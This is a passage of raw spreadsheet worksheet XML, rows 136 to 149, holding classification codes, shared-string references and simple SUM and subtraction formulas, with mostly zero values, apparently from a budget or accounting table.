      </c>
      <c r="AO136" s="17">
        <f t="shared" si="46"/>
        <v>0</v>
      </c>
      <c r="AP136" s="17">
        <f t="shared" si="46"/>
        <v>0</v>
      </c>
    </row>
    <row r="137" ht="18" customHeight="1" spans="1:42">
      <c r="A137" s="10">
        <v>103020304</v>
      </c>
      <c r="B137" s="16" t="s">
        <v>2730</v>
      </c>
      <c r="C137" s="17">
        <v>0</v>
      </c>
      <c r="D137" s="13">
        <v>2012303</v>
      </c>
      <c r="E137" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F137" s="14">
        <f t="shared" si="43"/>
        <v>0</v>
      </c>
      <c r="G137" s="17"/>
      <c r="H137" s="17"/>
      <c r="I137" s="17"/>
      <c r="J137" s="17"/>
      <c r="K137" s="17"/>
      <c r="L137" s="17"/>
      <c r="M137" s="17"/>
      <c r="N137" s="17"/>
      <c r="O137" s="17"/>
      <c r="P137" s="17"/>
      <c r="Q137" s="17"/>
      <c r="R137" s="17"/>
      <c r="S137" s="17"/>
      <c r="T137" s="17"/>
      <c r="U137" s="17"/>
      <c r="V137" s="17"/>
      <c r="W137" s="17"/>
      <c r="X137" s="17"/>
      <c r="Y137" s="17"/>
      <c r="Z137" s="17"/>
      <c r="AA137" s="17"/>
      <c r="AB137" s="17"/>
      <c r="AC137" s="17"/>
      <c r="AD137" s="17"/>
      <c r="AE137" s="17">
        <f t="shared" si="46"/>
        <v>0</v>
      </c>
      <c r="AF137" s="17">
        <f t="shared" si="46"/>
        <v>0</v>
      </c>
      <c r="AG137" s="17">
        <f t="shared" si="46"/>
        <v>0</v>
      </c>
      <c r="AH137" s="17">
        <f t="shared" si="46"/>
        <v>0</v>
      </c>
      <c r="AI137" s="17">
        <f t="shared" si="46"/>
        <v>0</v>
      </c>
      <c r="AJ137" s="17">
        <f t="shared" si="46"/>
        <v>0</v>
      </c>
      <c r="AK137" s="17">
        <f t="shared" si="46"/>
        <v>0</v>
      </c>
      <c r="AL137" s="17">
        <f t="shared" si="46"/>
        <v>0</v>
      </c>
      <c r="AM137" s="17">
        <f t="shared" si="46"/>
        <v>0</v>
      </c>
      <c r="AN137" s="17">
        <f t="shared" si="46"/>
        <v>0</v>
      </c>
      <c r="AO137" s="17">
        <f t="shared" si="46"/>
        <v>0</v>
      </c>
      <c r="AP137" s="17">
        <f t="shared" si="46"/>
        <v>0</v>
      </c>
    </row>
    <row r="138" ht="18" customHeight="1" spans="1:42">
      <c r="A138" s="10">
        <v>103020305</v>
      </c>
      <c r="B138" s="16" t="s">
        <v>2731</v>
      </c>
      <c r="C138" s="17">
        <v>0</v>
      </c>
      <c r="D138" s="13">
        <v>2012304</v>
      </c>
      <c r="E138" s="16" t="s">
        <v>2732</v>
      </c>
      <c r="F138" s="14">
        <f t="shared" si="43"/>
        <v>0</v>
      </c>
      <c r="G138" s="17"/>
      <c r="H138" s="17"/>
      <c r="I138" s="17"/>
      <c r="J138" s="17"/>
      <c r="K138" s="17"/>
      <c r="L138" s="17"/>
      <c r="M138" s="17"/>
      <c r="N138" s="17"/>
      <c r="O138" s="17"/>
      <c r="P138" s="17"/>
      <c r="Q138" s="17"/>
      <c r="R138" s="17"/>
      <c r="S138" s="17"/>
      <c r="T138" s="17"/>
      <c r="U138" s="17"/>
      <c r="V138" s="17"/>
      <c r="W138" s="17"/>
      <c r="X138" s="17"/>
      <c r="Y138" s="17"/>
      <c r="Z138" s="17"/>
      <c r="AA138" s="17"/>
      <c r="AB138" s="17"/>
      <c r="AC138" s="17"/>
      <c r="AD138" s="17"/>
      <c r="AE138" s="17">
        <f t="shared" si="46"/>
        <v>0</v>
      </c>
      <c r="AF138" s="17">
        <f t="shared" si="46"/>
        <v>0</v>
      </c>
      <c r="AG138" s="17">
        <f t="shared" si="46"/>
        <v>0</v>
      </c>
      <c r="AH138" s="17">
        <f t="shared" si="46"/>
        <v>0</v>
      </c>
      <c r="AI138" s="17">
        <f t="shared" si="46"/>
        <v>0</v>
      </c>
      <c r="AJ138" s="17">
        <f t="shared" si="46"/>
        <v>0</v>
      </c>
      <c r="AK138" s="17">
        <f t="shared" si="46"/>
        <v>0</v>
      </c>
      <c r="AL138" s="17">
        <f t="shared" si="46"/>
        <v>0</v>
      </c>
      <c r="AM138" s="17">
        <f t="shared" si="46"/>
        <v>0</v>
      </c>
      <c r="AN138" s="17">
        <f t="shared" si="46"/>
        <v>0</v>
      </c>
      <c r="AO138" s="17">
        <f t="shared" si="46"/>
        <v>0</v>
      </c>
      <c r="AP138" s="17">
        <f t="shared" si="46"/>
        <v>0</v>
      </c>
    </row>
    <row r="139" ht="18" customHeight="1" spans="1:42">
      <c r="A139" s="10">
        <v>103020399</v>
      </c>
      <c r="B139" s="16" t="s">
        <v>2733</v>
      </c>
      <c r="C139" s="17">
        <v>0</v>
      </c>
      <c r="D139" s="13">
        <v>2012350</v>
      </c>
      <c r="E139" s="16" t="s">
        <v>2539</v>
      </c>
      <c r="F139" s="14">
        <f t="shared" si="43"/>
        <v>0</v>
      </c>
      <c r="G139" s="17"/>
      <c r="H139" s="17"/>
      <c r="I139" s="17"/>
      <c r="J139" s="17"/>
      <c r="K139" s="17"/>
      <c r="L139" s="17"/>
      <c r="M139" s="17"/>
      <c r="N139" s="17"/>
      <c r="O139" s="17"/>
      <c r="P139" s="17"/>
      <c r="Q139" s="17"/>
      <c r="R139" s="17"/>
      <c r="S139" s="17"/>
      <c r="T139" s="17"/>
      <c r="U139" s="17"/>
      <c r="V139" s="17"/>
      <c r="W139" s="17"/>
      <c r="X139" s="17"/>
      <c r="Y139" s="17"/>
      <c r="Z139" s="17"/>
      <c r="AA139" s="17"/>
      <c r="AB139" s="17"/>
      <c r="AC139" s="17"/>
      <c r="AD139" s="17"/>
      <c r="AE139" s="17">
        <f t="shared" si="46"/>
        <v>0</v>
      </c>
      <c r="AF139" s="17">
        <f t="shared" si="46"/>
        <v>0</v>
      </c>
      <c r="AG139" s="17">
        <f t="shared" si="46"/>
        <v>0</v>
      </c>
      <c r="AH139" s="17">
        <f t="shared" si="46"/>
        <v>0</v>
      </c>
      <c r="AI139" s="17">
        <f t="shared" si="46"/>
        <v>0</v>
      </c>
      <c r="AJ139" s="17">
        <f t="shared" si="46"/>
        <v>0</v>
      </c>
      <c r="AK139" s="17">
        <f t="shared" si="46"/>
        <v>0</v>
      </c>
      <c r="AL139" s="17">
        <f t="shared" si="46"/>
        <v>0</v>
      </c>
      <c r="AM139" s="17">
        <f t="shared" si="46"/>
        <v>0</v>
      </c>
      <c r="AN139" s="17">
        <f t="shared" si="46"/>
        <v>0</v>
      </c>
      <c r="AO139" s="17">
        <f t="shared" si="46"/>
        <v>0</v>
      </c>
      <c r="AP139" s="17">
        <f t="shared" si="46"/>
        <v>0</v>
      </c>
    </row>
    <row r="140" ht="18" customHeight="1" spans="1:42">
      <c r="A140" s="10">
        <v>1030205</v>
      </c>
      <c r="B140" s="16" t="s">
        <v>2734</v>
      </c>
      <c r="C140" s="17">
        <v>0</v>
      </c>
      <c r="D140" s="13">
        <v>2012399</v>
      </c>
      <c r="E140" s="16" t="s">
        <v>2735</v>
      </c>
      <c r="F140" s="14">
        <f t="shared" si="43"/>
        <v>0</v>
      </c>
      <c r="G140" s="17"/>
      <c r="H140" s="17"/>
      <c r="I140" s="17"/>
      <c r="J140" s="17"/>
      <c r="K140" s="17"/>
      <c r="L140" s="17"/>
      <c r="M140" s="17"/>
      <c r="N140" s="17"/>
      <c r="O140" s="17"/>
      <c r="P140" s="17"/>
      <c r="Q140" s="17"/>
      <c r="R140" s="17"/>
      <c r="S140" s="17"/>
      <c r="T140" s="17"/>
      <c r="U140" s="17"/>
      <c r="V140" s="17"/>
      <c r="W140" s="17"/>
      <c r="X140" s="17"/>
      <c r="Y140" s="17"/>
      <c r="Z140" s="17"/>
      <c r="AA140" s="17"/>
      <c r="AB140" s="17"/>
      <c r="AC140" s="17"/>
      <c r="AD140" s="17"/>
      <c r="AE140" s="17">
        <f t="shared" si="46"/>
        <v>0</v>
      </c>
      <c r="AF140" s="17">
        <f t="shared" si="46"/>
        <v>0</v>
      </c>
      <c r="AG140" s="17">
        <f t="shared" si="46"/>
        <v>0</v>
      </c>
      <c r="AH140" s="17">
        <f t="shared" si="46"/>
        <v>0</v>
      </c>
      <c r="AI140" s="17">
        <f t="shared" si="46"/>
        <v>0</v>
      </c>
      <c r="AJ140" s="17">
        <f t="shared" si="46"/>
        <v>0</v>
      </c>
      <c r="AK140" s="17">
        <f t="shared" si="46"/>
        <v>0</v>
      </c>
      <c r="AL140" s="17">
        <f t="shared" si="46"/>
        <v>0</v>
      </c>
      <c r="AM140" s="17">
        <f t="shared" si="46"/>
        <v>0</v>
      </c>
      <c r="AN140" s="17">
        <f t="shared" si="46"/>
        <v>0</v>
      </c>
      <c r="AO140" s="17">
        <f t="shared" si="46"/>
        <v>0</v>
      </c>
      <c r="AP140" s="17">
        <f t="shared" si="46"/>
        <v>0</v>
      </c>
    </row>
    <row r="141" ht="18" customHeight="1" spans="1:42">
      <c r="A141" s="10">
        <v>1030210</v>
      </c>
      <c r="B141" s="16" t="s">
        <v>2736</v>
      </c>
      <c r="C141" s="17">
        <v>0</v>
      </c>
      <c r="D141" s="13">
        <v>20125</v>
      </c>
      <c r="E141" s="11" t="s">
        <v>2737</v>
      </c>
      <c r="F141" s="14">
        <f t="shared" si="43"/>
        <v>0</v>
      </c>
      <c r="G141" s="12">
        <f t="shared" ref="G141:R141" si="47">SUM(G142:G148)</f>
        <v>0</v>
      </c>
      <c r="H141" s="12">
        <f t="shared" si="47"/>
        <v>0</v>
      </c>
      <c r="I141" s="12">
        <f t="shared" si="47"/>
        <v>0</v>
      </c>
      <c r="J141" s="12">
        <f t="shared" si="47"/>
        <v>0</v>
      </c>
      <c r="K141" s="12">
        <f t="shared" si="47"/>
        <v>0</v>
      </c>
      <c r="L141" s="12">
        <f t="shared" si="47"/>
        <v>0</v>
      </c>
      <c r="M141" s="12">
        <f t="shared" si="47"/>
        <v>0</v>
      </c>
      <c r="N141" s="12">
        <f t="shared" si="47"/>
        <v>0</v>
      </c>
      <c r="O141" s="12">
        <f t="shared" si="47"/>
        <v>0</v>
      </c>
      <c r="P141" s="12">
        <f t="shared" si="47"/>
        <v>0</v>
      </c>
      <c r="Q141" s="12">
        <f t="shared" si="47"/>
        <v>0</v>
      </c>
      <c r="R141" s="12">
        <f t="shared" si="47"/>
        <v>0</v>
      </c>
      <c r="S141" s="12">
        <v>0</v>
      </c>
      <c r="T141" s="12">
        <v>0</v>
      </c>
      <c r="U141" s="12">
        <v>0</v>
      </c>
      <c r="V141" s="12">
        <v>0</v>
      </c>
      <c r="W141" s="12">
        <v>0</v>
      </c>
      <c r="X141" s="12">
        <v>0</v>
      </c>
      <c r="Y141" s="12">
        <v>0</v>
      </c>
      <c r="Z141" s="12">
        <v>0</v>
      </c>
      <c r="AA141" s="12">
        <v>0</v>
      </c>
      <c r="AB141" s="12">
        <v>0</v>
      </c>
      <c r="AC141" s="12">
        <v>0</v>
      </c>
      <c r="AD141" s="12">
        <v>0</v>
      </c>
      <c r="AE141" s="12">
        <f t="shared" ref="AE141:AP141" si="48">SUM(AE142:AE148)</f>
        <v>0</v>
      </c>
      <c r="AF141" s="12">
        <f t="shared" si="48"/>
        <v>0</v>
      </c>
      <c r="AG141" s="12">
        <f t="shared" si="48"/>
        <v>0</v>
      </c>
      <c r="AH141" s="12">
        <f t="shared" si="48"/>
        <v>0</v>
      </c>
      <c r="AI141" s="12">
        <f t="shared" si="48"/>
        <v>0</v>
      </c>
      <c r="AJ141" s="12">
        <f t="shared" si="48"/>
        <v>0</v>
      </c>
      <c r="AK141" s="12">
        <f t="shared" si="48"/>
        <v>0</v>
      </c>
      <c r="AL141" s="12">
        <f t="shared" si="48"/>
        <v>0</v>
      </c>
      <c r="AM141" s="12">
        <f t="shared" si="48"/>
        <v>0</v>
      </c>
      <c r="AN141" s="12">
        <f t="shared" si="48"/>
        <v>0</v>
      </c>
      <c r="AO141" s="12">
        <f t="shared" si="48"/>
        <v>0</v>
      </c>
      <c r="AP141" s="12">
        <f t="shared" si="48"/>
        <v>0</v>
      </c>
    </row>
    <row r="142" ht="18" customHeight="1" spans="1:42">
      <c r="A142" s="10">
        <v>1030212</v>
      </c>
      <c r="B142" s="16" t="s">
        <v>2738</v>
      </c>
      <c r="C142" s="17">
        <v>0</v>
      </c>
      <c r="D142" s="13">
        <v>2012501</v>
      </c>
      <c r="E142" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F142" s="14">
        <f t="shared" si="43"/>
        <v>0</v>
      </c>
      <c r="G142" s="17"/>
      <c r="H142" s="17"/>
      <c r="I142" s="17"/>
      <c r="J142" s="17"/>
      <c r="K142" s="17"/>
      <c r="L142" s="17"/>
      <c r="M142" s="17"/>
      <c r="N142" s="17"/>
      <c r="O142" s="17"/>
      <c r="P142" s="17"/>
      <c r="Q142" s="17"/>
      <c r="R142" s="17"/>
      <c r="S142" s="17"/>
      <c r="T142" s="17"/>
      <c r="U142" s="17"/>
      <c r="V142" s="17"/>
      <c r="W142" s="17"/>
      <c r="X142" s="17"/>
      <c r="Y142" s="17"/>
      <c r="Z142" s="17"/>
      <c r="AA142" s="17"/>
      <c r="AB142" s="17"/>
      <c r="AC142" s="17"/>
      <c r="AD142" s="17"/>
      <c r="AE142" s="17">
        <f t="shared" ref="AE142:AP148" si="49">G142-S142</f>
        <v>0</v>
      </c>
      <c r="AF142" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AG142" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AH142" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AI142" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AJ142" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AK142" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AL142" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AM142" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AN142" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AO142" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AP142" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
    </row>
    <row r="143" ht="18" customHeight="1" spans="1:42">
      <c r="A143" s="10">
        <v>1030216</v>
      </c>
      <c r="B143" s="16" t="s">
        <v>2739</v>
      </c>
      <c r="C143" s="17">
        <v>0</v>
      </c>
      <c r="D143" s="13">
        <v>2012502</v>
      </c>
      <c r="E143" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F143" s="14">
        <f t="shared" si="43"/>
        <v>0</v>
      </c>
      <c r="G143" s="17"/>
      <c r="H143" s="17"/>
      <c r="I143" s="17"/>
      <c r="J143" s="17"/>
      <c r="K143" s="17"/>
      <c r="L143" s="17"/>
      <c r="M143" s="17"/>
      <c r="N143" s="17"/>
      <c r="O143" s="17"/>
      <c r="P143" s="17"/>
      <c r="Q143" s="17"/>
      <c r="R143" s="17"/>
      <c r="S143" s="17"/>
      <c r="T143" s="17"/>
      <c r="U143" s="17"/>
      <c r="V143" s="17"/>
      <c r="W143" s="17"/>
      <c r="X143" s="17"/>
      <c r="Y143" s="17"/>
      <c r="Z143" s="17"/>
      <c r="AA143" s="17"/>
      <c r="AB143" s="17"/>
      <c r="AC143" s="17"/>
      <c r="AD143" s="17"/>
      <c r="AE143" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AF143" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AG143" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AH143" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AI143" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AJ143" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AK143" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AL143" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AM143" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AN143" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AO143" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AP143" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
    </row>
    <row r="144" ht="18" customHeight="1" spans="1:42">
      <c r="A144" s="10">
        <v>1030217</v>
      </c>
      <c r="B144" s="16" t="s">
        <v>2740</v>
      </c>
      <c r="C144" s="17">
        <v>0</v>
      </c>
      <c r="D144" s="13">
        <v>2012503</v>
      </c>
      <c r="E144" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F144" s="14">
        <f t="shared" si="43"/>
        <v>0</v>
      </c>
      <c r="G144" s="17"/>
      <c r="H144" s="17"/>
      <c r="I144" s="17"/>
      <c r="J144" s="17"/>
      <c r="K144" s="17"/>
      <c r="L144" s="17"/>
      <c r="M144" s="17"/>
      <c r="N144" s="17"/>
      <c r="O144" s="17"/>
      <c r="P144" s="17"/>
      <c r="Q144" s="17"/>
      <c r="R144" s="17"/>
      <c r="S144" s="17"/>
      <c r="T144" s="17"/>
      <c r="U144" s="17"/>
      <c r="V144" s="17"/>
      <c r="W144" s="17"/>
      <c r="X144" s="17"/>
      <c r="Y144" s="17"/>
      <c r="Z144" s="17"/>
      <c r="AA144" s="17"/>
      <c r="AB144" s="17"/>
      <c r="AC144" s="17"/>
      <c r="AD144" s="17"/>
      <c r="AE144" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AF144" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AG144" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AH144" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AI144" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AJ144" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AK144" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AL144" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AM144" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AN144" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AO144" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AP144" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
    </row>
    <row r="145" ht="18" customHeight="1" spans="1:42">
      <c r="A145" s="10">
        <v>1030218</v>
      </c>
      <c r="B145" s="16" t="s">
        <v>2741</v>
      </c>
      <c r="C145" s="17">
        <v>0</v>
      </c>
      <c r="D145" s="13">
        <v>2012504</v>
      </c>
      <c r="E145" s="16" t="s">
        <v>2742</v>
      </c>
      <c r="F145" s="14">
        <f t="shared" si="43"/>
        <v>0</v>
      </c>
      <c r="G145" s="17"/>
      <c r="H145" s="17"/>
      <c r="I145" s="17"/>
      <c r="J145" s="17"/>
      <c r="K145" s="17"/>
      <c r="L145" s="17"/>
      <c r="M145" s="17"/>
      <c r="N145" s="17"/>
      <c r="O145" s="17"/>
      <c r="P145" s="17"/>
      <c r="Q145" s="17"/>
      <c r="R145" s="17"/>
      <c r="S145" s="17"/>
      <c r="T145" s="17"/>
      <c r="U145" s="17"/>
      <c r="V145" s="17"/>
      <c r="W145" s="17"/>
      <c r="X145" s="17"/>
      <c r="Y145" s="17"/>
      <c r="Z145" s="17"/>
      <c r="AA145" s="17"/>
      <c r="AB145" s="17"/>
      <c r="AC145" s="17"/>
      <c r="AD145" s="17"/>
      <c r="AE145" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AF145" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AG145" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AH145" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AI145" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AJ145" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AK145" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AL145" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AM145" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AN145" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AO145" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AP145" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
    </row>
    <row r="146" ht="18" customHeight="1" spans="1:42">
      <c r="A146" s="10">
        <v>1030219</v>
      </c>
      <c r="B146" s="16" t="s">
        <v>2743</v>
      </c>
      <c r="C146" s="17">
        <v>0</v>
      </c>
      <c r="D146" s="13">
        <v>2012505</v>
      </c>
      <c r="E146" s="16" t="s">
        <v>2744</v>
      </c>
      <c r="F146" s="14">
        <f t="shared" si="43"/>
        <v>0</v>
      </c>
      <c r="G146" s="17"/>
      <c r="H146" s="17"/>
      <c r="I146" s="17"/>
      <c r="J146" s="17"/>
      <c r="K146" s="17"/>
      <c r="L146" s="17"/>
      <c r="M146" s="17"/>
      <c r="N146" s="17"/>
      <c r="O146" s="17"/>
      <c r="P146" s="17"/>
      <c r="Q146" s="17"/>
      <c r="R146" s="17"/>
      <c r="S146" s="17"/>
      <c r="T146" s="17"/>
      <c r="U146" s="17"/>
      <c r="V146" s="17"/>
      <c r="W146" s="17"/>
      <c r="X146" s="17"/>
      <c r="Y146" s="17"/>
      <c r="Z146" s="17"/>
      <c r="AA146" s="17"/>
      <c r="AB146" s="17"/>
      <c r="AC146" s="17"/>
      <c r="AD146" s="17"/>
      <c r="AE146" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AF146" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AG146" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AH146" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AI146" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AJ146" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AK146" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AL146" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AM146" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AN146" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AO146" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AP146" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
    </row>
    <row r="147" ht="18" customHeight="1" spans="1:42">
      <c r="A147" s="10">
        <v>1030220</v>
      </c>
      <c r="B147" s="16" t="s">
        <v>2745</v>
      </c>
      <c r="C147" s="17">
        <v>0</v>
      </c>
      <c r="D147" s="13">
        <v>2012550</v>
      </c>
      <c r="E147" s="16" t="s">
        <v>2539</v>
      </c>
      <c r="F147" s="14">
        <f t="shared" si="43"/>
        <v>0</v>
      </c>
      <c r="G147" s="17"/>
      <c r="H147" s="17"/>
      <c r="I147" s="17"/>
      <c r="J147" s="17"/>
      <c r="K147" s="17"/>
      <c r="L147" s="17"/>
      <c r="M147" s="17"/>
      <c r="N147" s="17"/>
      <c r="O147" s="17"/>
      <c r="P147" s="17"/>
      <c r="Q147" s="17"/>
      <c r="R147" s="17"/>
      <c r="S147" s="17"/>
      <c r="T147" s="17"/>
      <c r="U147" s="17"/>
      <c r="V147" s="17"/>
      <c r="W147" s="17"/>
      <c r="X147" s="17"/>
      <c r="Y147" s="17"/>
      <c r="Z147" s="17"/>
      <c r="AA147" s="17"/>
      <c r="AB147" s="17"/>
      <c r="AC147" s="17"/>
      <c r="AD147" s="17"/>
      <c r="AE147" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AF147" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AG147" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AH147" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AI147" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AJ147" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AK147" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AL147" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AM147" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AN147" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AO147" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AP147" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
    </row>
    <row r="148" ht="18" customHeight="1" spans="1:42">
      <c r="A148" s="10">
        <v>1030222</v>
      </c>
      <c r="B148" s="16" t="s">
        <v>2746</v>
      </c>
      <c r="C148" s="17">
        <v>0</v>
      </c>
      <c r="D148" s="13">
        <v>2012599</v>
      </c>
      <c r="E148" s="16" t="s">
        <v>2747</v>
      </c>
      <c r="F148" s="14">
        <f t="shared" si="43"/>
        <v>0</v>
      </c>
      <c r="G148" s="17"/>
      <c r="H148" s="17"/>
      <c r="I148" s="17"/>
      <c r="J148" s="17"/>
      <c r="K148" s="17"/>
      <c r="L148" s="17"/>
      <c r="M148" s="17"/>
      <c r="N148" s="17"/>
      <c r="O148" s="17"/>
      <c r="P148" s="17"/>
      <c r="Q148" s="17"/>
      <c r="R148" s="17"/>
      <c r="S148" s="17"/>
      <c r="T148" s="17"/>
      <c r="U148" s="17"/>
      <c r="V148" s="17"/>
      <c r="W148" s="17"/>
      <c r="X148" s="17"/>
      <c r="Y148" s="17"/>
      <c r="Z148" s="17"/>
      <c r="AA148" s="17"/>
      <c r="AB148" s="17"/>
      <c r="AC148" s="17"/>
      <c r="AD148" s="17"/>
      <c r="AE148" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AF148" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AG148" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AH148" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AI148" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AJ148" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AK148" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AL148" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AM148" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AN148" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AO148" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="AP148" s="17">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
    </row>
    <row r="149" ht="18" customHeight="1" spans="1:42">
      <c r="A149" s="10">
        <v>1030223</v>
      </c>
      <c r="B149" s="16" t="s">
        <v>2748</v>
      </c>
      <c r="C149" s="17">
        <v>0</v>
      </c>
      <c r="D149" s="13">
        <v>20126</v>
      </c>
      <c r="E149" s="11" t="s">
        <v>2749</v>
      </c>
      <c r="F149" s="14">
        <f t="shared" si="43"/>
        <v>24</v>
      </c>
      <c r="G149" s="12">
        <f t="shared" ref="G149:R149" si="50">SUM(G150:G154)</f>
        <v>0</v>
      </c>
      <c r="H149" s="12">
        <f t="shared" si="50"/>
        <v>0</v>
      </c>
      <c r="I149" s="12">
        <f t="shared" si="50"/>
        <v>0</v>
      </c>
      <c r="J149" s="12">
        <f t="shared" si="50"/>
        <v>0</v>
      </c>
      <c r="K149" s="12">
        <f t="shared" si="50"/>
        <v>0</v>
      </c>
      <c r="L149" s="12">
        <f t="shared" si="50"/>
        <v>24</v>
      </c>
      <c r="M149" s="12">
        <f t="shared" si="50"/>
        <v>0</v>
      </c>
      <c r="N149" s="12">
        <f t="shared" si="50"/>
        <v>0</v>
      </c>
      <c r="O149" s="12">
        <f t="shared" si="50"/>
        <v>0</v>
      </c>
      <c r="P149" s="12">
        <f t="shared" si="50"/>
        <v>0</v>
      </c>
      <c r="Q149" s="12">
        <f t="shared" si="50"/>
        <v>0</v>
      </c>
      <c r="R149" s="12">
        <f t="shared" si="50"/>
        <v>0</v>
      </c>
      <c r="S149" s="12">
        <v>0</v>
      </c>
      <c r="T149" s="12">
        <v>0</v>
      </c>
      <c r="U149" s="12">
        <v>0</v>
      </c>
      <c r="V149" s="12">
        <v>0</v>
      </c>
      <c r="W149" s="12">
        <v>0</v>
      </c>
      <c r="X149" s="12">
        <v>13</v>
      </c>
      <c r="Y149" s="12">
        <v>0</v>
      </c>
      <c r="Z149" s="12">
        <v>0</v>
      </c>
      <c r="AA149" s="12">
        <v>0</v>
      </c>
      <c r="AB149" s="12">
        <v>0</v>
      </c>
      <c r="AC149" s="12">
        <v>0</v>
      </c>
      <c r="AD149" s="12">
        <v>0</v>
      </c>
      <c r="AE149" s="12">
